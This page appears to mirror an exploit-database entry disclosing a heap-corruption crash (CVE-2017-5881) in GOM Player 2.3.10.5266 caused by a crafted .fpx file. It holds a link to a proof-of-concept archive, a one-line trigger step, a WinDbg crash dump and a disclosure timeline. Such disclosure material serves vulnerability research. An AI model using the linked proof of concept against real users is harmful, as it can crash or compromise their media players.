Skip to content
cyberexploits
doswindowstext

GOM Player 2.3.10.5266 - '.fpx' Denial of Service

GOM Player 2.3.10.5266 - '.fpx' Denial of Service

Publié le 2017-02-15

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/dos/41367.txt7eac4c3a
raw
# Exploit Title: GOM Player 2.3.10.5266 - Remote heap corruption (.fpx)

# Date: 2017-02-15

# Exploit Author: Peter Baris

# Exploit link: http://www.saptech-erp.com.au/resources/PoC.zip

# Software Link: http://player.gomlab.com/download.gom?language=eng

# CVE: CVE-2017-5881

# Version: 2.3.10.5266

# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64



POC:



https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41367.zip  



Open the malicious fpx file with CTRL+U, served by a webserver:



 WinDbg 



(864.150): Access violation - code c0000005 (first chance)



First chance exceptions are reported before any exception handling.



This exception may be expected and handled.



eax=092fcde8 ebx=00000000 ecx=41414141 edx=090ff798 esi=090ff790

edi=05b10000



eip=77902fe5 esp=10a9fbb4 ebp=10a9fc94 iopl=0         nv up ei ng nz na pe

cy



cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b

efl=00010287



ntdll!RtlpFreeHeap+0x4d6:



77902fe5 8b19            mov     ebx,dword ptr [ecx]

ds:002b:41414141=????????



 



0:022> !exchain



10a9fc84: ntdll!_except_handler4+0 (77946325)



  CRT scope  0, func:   ntdll!RtlpFreeHeap+b7d (7795b52d)



10a9fd54: *** WARNING: Unable to verify checksum for C:\Program Files

(x86)\GRETECH\GomPlayer\gvf.ax



*** ERROR: Symbol file could not be found.  Defaulted to export symbols for

C:\Program Files (x86)\GRETECH\GomPlayer\gvf.ax - 



gvf!DllGetClassObject+5801b (6e02bc7b)



10a9fdcc: gvf!DllGetClassObject+57af8 (6e02b758)



10a9fe00: gvf!DllGetClassObject+57ac8 (6e02b728)



10a9fe84: gvf!DllGetClassObject+57fe0 (6e02bc40)



10a9feac: gvf!DllGetClassObject+5d5e8 (6e031248)



10a9ff60: ntdll!_except_handler4+0 (77946325)



  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (77946608)



                func:   ntdll!__RtlUserThreadStart+63 (77948227)



10a9ff80: ntdll!FinalExceptionHandler+0 (779983b1)



Invalid exception stack at ffffffff





2017-02-04 notification sent to developers



2017-02-05 developerss requested information about the issue



2017-02-09 information sent with the PoC



no reply if they plan to release a fix or not

 



Voir sur GitHub